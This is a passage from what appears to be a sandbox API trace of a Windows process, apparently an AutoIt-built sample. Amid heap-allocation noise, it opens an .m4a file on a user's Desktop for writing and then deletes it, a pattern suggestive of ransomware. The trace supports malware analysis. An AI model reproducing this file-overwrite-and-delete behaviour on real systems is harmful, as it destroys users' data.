dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0031.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0031.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0031.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0031.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0031.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0031.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0031.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0031.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0031.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0031.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0031.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0031.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0031.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0031.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0031.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0031.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0031.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0031.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0031.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0031.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.720] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.720] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.720] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.720] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0031.720] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.720] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.721] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.721] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.721] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.721] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.721] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.721] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.721] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.721] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.721] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.721] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.721] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.721] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.721] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.721] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.721] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0031.721] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.721] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\lk15vz5k\\yrqdf_asfhekn.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0031.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0031.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0031.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0031.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0031.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0031.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0031.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0031.722] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.722] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0031.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0031.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0031.722] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0031.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0031.722] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0031.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0031.722] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0031.722] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0031.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0031.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0031.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0031.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0031.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0031.722] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0031.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0031.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0031.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0031.723] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0031.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0031.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0031.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa) returned 0x889508 [0031.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x889508, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0031.723] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.723] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0031.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0031.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0031.723] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0031.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0031.723] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0031.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0031.723] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0031.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0031.723] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0031.723] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0031.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0031.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0031.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0031.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0031.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0031.724] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0031.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af538 [0031.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0031.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0031.724] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0031.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0031.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0031.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c9a0 [0031.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88c9a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0031.724] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.724] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0031.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0031.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0031.724] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0031.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0031.724] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0031.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0031.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0031.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0031.724] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a", lpFilePart=0x0) returned 0x58 [0031.725] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d88b1e0, ftCreationTime.dwHighDateTime=0x1d5be72, ftLastAccessTime.dwLowDateTime=0x7e10b2e0, ftLastAccessTime.dwHighDateTime=0x1d5c4a1, ftLastWriteTime.dwLowDateTime=0x12cbeb60, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x42e1, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="yRQDF_aSfhekn.m4a", cAlternateFileName="YRQDF_~1.M4A")) returned 0x7c2240 [0031.725] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\lk15vz5k\\yrqdf_asfhekn.m4a")) returned 1 [0031.726] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d88b1e0, ftCreationTime.dwHighDateTime=0x1d5be72, ftLastAccessTime.dwLowDateTime=0x7e10b2e0, ftLastAccessTime.dwHighDateTime=0x1d5c4a1, ftLastWriteTime.dwLowDateTime=0x12cbeb60, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x42e1, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="yRQDF_aSfhekn.m4a", cAlternateFileName="YRQDF_~1.M4A")) returned 0 [0031.726] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0031.726] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.726] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0031.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0031.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0031.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0031.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0031.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0031.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0031.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0031.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0031.726] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0031.726] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0031.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0031.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0031.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0031.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0031.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0031.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0031.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0031.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0031.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0031.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0031.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0031.727] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0031.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0031.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0031.727] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0031.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0031.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0031.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0031.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0031.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0031.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0031.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0031.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0031.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0031.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0031.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0031.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0031.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0031.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0031.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0031.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0031.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0031.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0031.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0031.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0031.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0031.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0031.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0031.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0031.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0031.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0031.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0031.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0031.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0031.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0031.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0031.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0031.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0031.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0031.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0031.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0031.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0031.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0031.728] HeapFree (in: 